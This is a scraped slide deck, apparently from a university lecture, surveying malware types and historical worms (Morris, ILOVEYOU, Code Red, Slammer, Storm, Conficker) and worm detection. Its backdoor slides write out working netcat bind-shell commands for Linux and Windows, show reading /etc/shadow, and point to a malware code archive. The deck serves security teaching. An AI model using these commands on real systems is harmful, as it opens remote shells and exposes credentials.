Upload
annabella-hopkins
View
216
Download
3
Tags:
Embed Size (px)
Citation preview
Introduction• Today, cover malware–Worms, Trojan Horses/ Backdoors– Define Rootkits, viruses - cover later
– Nearly all of these infect computers via the network• Email counts as a form of remote infection
– If you do decide to write one for fun don’t release it … could wind up in jail
2
3
Definitions• Worm– Replicates itself, stand alone program,
spreads via network• Virus– Program that attaches itself to another
program– Replicates itself, program must be run
• Trojan horse– Program that pretends to do one thing
but does something behind the scenes• Rootkit - A root kit is a component that
uses stealth to maintain a persistent and undetectable presence on the machine
5
Purpose of Malware
• What is the main purpose of most malware?
• Profit!!!!• Modern malware is a for-profit, big-business
undertaking• Online criminals invest significant amounts of
money and time in more efficient malware and better malware distribution mechanisms because financial rewards can be enormous
6
Purpose of Malware
• How is it distributed these days?• Malware has been part of computing for
decades• In the 1990s, Floppy Disks it got onto
your computer or network when you stuck an infected floppy disk into your drive,
• Then, Email becoming more prevalent, hackers designed malware to spread as infected email attachments
• Today,Internet is a fantastic distribution mechanism for malware
Worms
• A worm is self-replicating software designed to spread through the network
Typically, exploit security flaws in widely used services ... mostly buffer overflows
Causes massive damage Launch DDOS attacks, Install bot networks Access sensitive information Used for spam
Worms
• Worm vs Virus vs Trojan horse A virus is code embedded in a file or
program Viruses and Trojan horses rely on
humans• Human must access file or run program
Worms are often self-contained and may spread autonomously ... and they do!• Can also spread via email, Internet
Worms Spread?
• Copy itself directly across the network• Read your address book – Emails itself to everyone in your address
book– How easy is it to do this?–Microsoft outlook – was trivial < 5 lines of code to send out an email – Can cause outlook to send emails without
user awareness– Reason why so many worms for Outlook
12
Morris Worm• First appeared in 1988• Purpose – Determine where it could spread– Spread its infection– Remain undiscovered
• Morris claimed his worm had a bug…• Morris worm tried to re-infect
systems– Led to resource exhaustion
13
Morris WormHow did it spread? •Tried to obtain access to machine by…– User account password guessing– Exploited buffer overflow in fingerd– Exploited debug code in sendmail
•Flaws in fingerd and sendmail were well-known at the time, but not widely patched
14
Morris Worm
• Once access had been obtained to machine…
• “Bootstrap loader” sent to victim– Consisted of 99 lines of C code
• Victim machine compiled and executed code
• Bootstrap loader fetched the rest of worm
15
Morris Worm• Why was it successful?– If transmission of worm was
interrupted, all code was deleted– Code encrypted when downloaded– Code deleted after decrypting and
compiling–When running, worm regularly
changed its name and process identifier (PID)
I-Love-You Worm
• e-mail worm arrived May 4, 2000,
subject of "ILOVEYOU" and an attachment– LOVE-LETTER-FOR-YOU.TXT.vbs
I-Love-You Worm
• LOVE-LETTER-FOR-YOU.TXT.vbs– Upon opening attachment, software sent
copy of itself to everyone in user's address list, posing as user• Overwrote all these files types:• VBS, VBE, JS, JSE, CSS, WSH, SCT, HTA, JPG,
JPEG, MP3, and MP2• Overwritten files contain worm's body and
extensions changed to vbs
I-Love-You Worm How did it spread? • Sent a copy of itself to first 50 addresses in
Windows Address Book used by Microsoft Outlook
•Why was it successful?• Took advantage of a Microsoft algorithm for
hiding file extensions. Windows had begun hiding extensions by default
• Entice users to open the attachment, ensure continued propagation
• Exploited systemic weaknesses in design of Microsoft Outlook and Microsoft Windows which led to unused features easily running malicious code capable of achieving complete access to the operating system,
slide 19
Code Red I July 13, 2001: First worm of modern era Exploited buffer overflow in Microsoft’s Internet Information Server (IIS)
How did it spread? 1st through 20th of each month: Spread
Find new targets by random scan of IP address space Spawn 99 threads to generate addresses and look for
IIS Creator forgot to seed random number generator,
and every copy scanned same set of addresses ... Oops
21st through the end of each month: Attack
Defaced websites with “HELLO! Welcome to http://www.worm.com! Hacked by Chinese!”
slide 20
Code Red I v2
• July 19, 2001: Same codebase as Code Red I, but fixed the bug in random IP address generation– Compromised all vulnerable IIS servers on
Internet– Fast spread• Scanned address space grew exponentially• 350,000 hosts infected in 14 hours!!
• Payload: distributed packet flooding (denial of service) attack on www.whitehouse.gov
slide 21
• August 4, 2001: Same IIS vulnerability, completely different code, kills Code Red I– Known as “Code Red II” because of
comment in code– Worked only on Windows 2000, crashed NT
• Scanning algorithm preferred nearby addresses– Chose addresses from same class A with
probability ½, same class B with probability 3/8, and randomly from the entire Internet with probability 1/8
• Payload: installed root backdoor in IIS servers for unrestricted remote access
• Died by design on October 1, 2001
Code Red II
22
Code Red 2 kills off Code
Red 1
Code Red 2 settles into
weekly pattern
Nimda enters the ecosystem
Code Red 2 dies off as
programmed
CR 1 returns thanksto bad clocks
Slides: Vern Paxson
SQL Slammer• Another modern worm, SQL Slammer,
January 2003– Although titled "SQL slammer worm",
program didn't use SQL language• How did it work?• It exploited a buffer overflow bug in
Microsoft's SQL Server and Desktop Engine database products, for which a patch had been released six months earlier • Affected Microsoft SQL 2000
– Vulnerable population, 75,000 machines infected in less than 10 minutes
http://en.wikipedia.org/wiki/SQL_slammer_worm
slide 24
05:29:00 UTC, January 25, 2003[from Moore et al. “The Spread of the Sapphire/Slammer Worm”]
slide 25
30 Minutes Later
Size of circles is logarithmic inthe number of infected machines
[from Moore et al. “The Spread of the Sapphire/Slammer Worm”]
slide 26
Secret of Slammer’s Speed
• Why was it successful?• Old-style worms (Code Red) spawn a new
thread which tries to establish TCP connection• If successful, send a copy of itself over TCP–Limited by latency of the network
• Slammer, improved concept, connectionless UDP worm–No connection establishment, simply sent 404-byte UDP packet to randomly generated IP addresses–Limited only by bandwidth of the network
Modern WormsDon't Just Spread
• Old-Style Worms–Mostly to spread, very noticeable in attacks– How fast and far can we go?– Sometimes, dropped other malware to
maintain access
• Modern Worms – Stealthier– Always have payload of more malware–Many infection vectors - not just one– Use resources of machine, glean user
information
Modern WormsDon't Just Spread
• These worms spread more subtly,–Without making noise– Symptoms don't appear immediately, infected
computer can sit dormant for a long time– If it were a disease,• More like syphilis, whose symptoms may be
mild or disappear altogether,• Eventually come back years later and eat
your brain !!– Bruce Schneir http://www.schneier.com/blog/archives/2007/10/
the_storm_worm.html
slide 30
Storm Worm 2007• How did it spread?• Spread by cleverly designed spam campaign– Arrived as an email with catchy subject• First instance:“230 dead as storm batters
Europe” • Other examples: “Condoleeza Rice has
kicked German Chancellor”, “Radical Muslim drinking enemies’s blood”, “Saddam Hussein alive!”, “Fidel Castro dead”, etc.
• Attachment or URL with malicious payload– FullVideo.exe, MoreHere.exe, ReadMore.exe, etc.– Also masquerade as flash postcards
• Once opened,• Installs trojan (wincom32) and rootkit !!!
slide 31
Storm Worm Characteristics
• Infected host joined Botnet• Obfuscated P2P control structure– Interacted with peers via eDonkey protocol
• Obfuscated code, anti-debugging defenses– Goes into infinite loop if detects VMware or
Virtual PC– Large number of spurious probes, evidence
of external analysis, triggers distributed DoS attack
• Infection Estimates• Between 1 million and 50 million computers
infected worldwide
Storm Worm Characteristics
• Storm's Payload
• Morphs every 30 minutes or so,– Typical AV (antivirus) and IDS techniques less
effective --- use code signatures to detect
• Storm e-mail also changes all time, leveraging social engineering techniques. – There are always new subject lines and new
enticing text
• Storm began attacking anti-spam sites focused on identifying it -- spamhaus.org, 419eater and so on -- and the personal website of Joe Stewart, who published an analysis of Storm
Conficker Wormhttp://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/
InfectionDistribution
• Conficker.A was first detected on 21 November 2008 and exploited MS08-067, below is infection as of 4/1/2009
MS08-067 Server Service Buffer OverflowThis service facilitates file, print, and named-pipe sharing over the network for Windows-based computersSuccessful exploitation may result in execution of arbitrary code on the target host with System privileges!!!!
Conficker Worm
• Conficker.B, detected in February 2009, added ability to spread through network shares and removable storage devices– USB drives and AutoRun function in Windows
• Conficker.C, shuts down security services, blocks computers from connecting to security Web sites, and downloads a Trojan
• Also reaches out to other infected computers via peer-to-peer networking– Includes a list of 50,000 different domains, 500
will be contacted by the infected computer on April 1 to receive updated copies or other malware or instructions
Conficker Worm
• Where did Conficker come from?– Ties to Russian Business Network, not
sure
• Currently Still a problemhttp://www.confickerworkinggroup.org/
wiki/pmwiki.php/ANY/InfectionTracking
Worm Propagation Methods• Scanning worms - Worm chooses “random”
address• Coordinated scanning - Different worm
instances scan different addresses
• Meta-server worm Ask server for hosts to infect
• Topological worm - Uses information from infected hosts– Web server logs, email address books,
config files, SSH “known hosts”f
• Contagion worm - Propagate parasitically along with normally initiated communication
37
Worm Signature
• Monitor network and look for strings common to traffic with worm-like behavior
Signatures can then be used for content filtering
Slide: S Savage
38
Content Sifting
• Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm
• Two Consequences
Content Prevalence: W will be more common in traffic than other bitstrings of the same length
Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
• Content sifting: find W’s with high content prevalence and high address dispersion and drop that traffic
39
Malicious Code
• Using Worms transformed into Botnets
• Hundreds of thousands of vulnerable computers are being used to launch spam campaigns• 70 percent of all spam is now sent this way,
according to anti-spam firm Message Labs Inc.
• Perhaps 6 to 7 billion spam messages are routed through hacked home computers
40
Malicious Code• Attack Trends– Crossbreeding• Combo Malware raises threat, treats each
element as a building block• Malware developer of today constructs an
attack tool by selecting various blocks and combining them in a single piece of code–Worms used to spread backdoors– Bugbear.b worm, which appeared in
2003 featured several backdoors.– Blaster worm and Sobig.F virus also
installed backdoors
41
Malicious Code
• Attack Trends• Combo Malware ... far more likely to find
some hole in your defenses than single-trick malware• Fight combo malware, you need more than
your signature-based AV engine loaded on servers and desktops• You need to think in terms of holistic defense,
addressing multiple vulnerability points, hardening your overall network and preparing for the worst
Ed Skoudis
42
Maintaining Access
• Once you have infected computer, • Gotten in through a vulnerability
• System or Human• Maintain Access Needs Stealth way back in ..
• Install a remote control backdoor to victim system• Backdoor allows attacker access in the
future
43
Backdoors
• What is a Backdoor?– Once penetrate machine through one
of the ways we talked about previously–Want to install a future access point– A backdoor is a way in to the system
that allows an attacker admission whenever they want
44
Backdoors• Example– Netcat tool• Claim that netcat is one of the most popular
backdoor tools in use today• Netcat when run on victim machine can be
configured to listen on any TCP port – Executes any program for traffic coming
in on that port–Will have same permission as account
from which netcat was executed– Can send it data and have it executed on
victim machine• Assume attacker has gained access to a
victim machine and wants to set up a command-shell backdoor
45
BackdoorsLinux Example
$ nc –l –p 12345 –e /bin/sh (backdoor on victim_machine)
Runs the netcat program which listens on TCP port 12345
and executes shell with data sent on port 12345
$ nc victim_machine 12345 (client on attacker machine)
cmd: ls (will list contents of directory from victim machine)
sensitive_documents tools games
cmd: cat /etc/shadow (only works if user on victim has root)
46
Backdoors
• Example - Windows Machine• Can also use netcat on Windows machine• Instead of /bin/sh will use cmd.exe
C:\> nc –l –p 12345 –e cmd.exe (on victim machine)
Similar results!
47
Backdoors and Trojans
•Trojans Classic example:• Replace /bin/login - lets users log in to
system but saves passwords for later analysis
•Trojan Backdoor• Combination of a backdoor hiding inside of
a trojan program
48
Summary
–Malware – Viruses, Worms and combinations including Trojan backdoor components are rampant– Continues to be a serious problem for
everyone using the Internet– Not just teenagers looking to brag
anymore• More and more the proliferation appears to
be related to the business of spamming• Resources http://vx.netlux.org/ good for code examples